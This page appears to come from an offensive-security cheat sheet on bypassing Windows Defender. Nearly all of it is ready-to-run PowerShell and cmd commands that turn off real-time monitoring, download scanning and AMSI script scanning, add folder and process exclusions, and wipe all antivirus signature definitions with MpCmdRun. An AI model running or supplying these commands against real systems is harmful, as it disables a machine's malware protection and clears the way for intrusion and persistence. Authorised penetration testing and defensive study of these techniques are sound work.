Home Attacks Theory Author Discord

🟢Windows Defender Antivirus

Byapss Windows Defender Antivirus

C:\rfs> sc query windefend

Check status of Defender

PS C:\> Get-MpComputerStatus

Disable scanning all downloaded files and attachments, disable AMSI (reactive)

PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
PS C:\> Set-MpPreference -DisableIOAVProtection $true

Disable AMSI (set to 0 to enable)

PS C:\> Set-MpPreference -DisableScriptScanning 1

Exclude a folder

PS C:\> Add-MpPreference -ExclusionPath "C:\Temp"
PS C:\> Add-MpPreference -ExclusionPath "C:\Windows\Tasks"
PS C:\> Set-MpPreference -ExclusionProcess "word.exe", "vmwp.exe"

Remove signatures

if the Internet connection is present, they will be downloaded again

PS > & "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -RemoveDefinitions -All
PS > & "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

Disable real-time protection (proactive):

PS > Set-MpPreference -DisableRealTimeMonitoring $true

Disable scanning all downloaded files and attachments, and disable AMSI (reactive):

PS > Set-MpPreference -DisableIOAVProtection $true

Remove signatures (if Internet connection is present, they will be downloaded again):

PS > cd "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0"
PS > .\MpCmdRun.exe -RemoveDefinitions -All
Or
Cmd > "%PROGRAMFILES%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

Lower Token Integrity

Disable Defender

PreviousWDAC (Device Guard)NextAppLocker

Last updated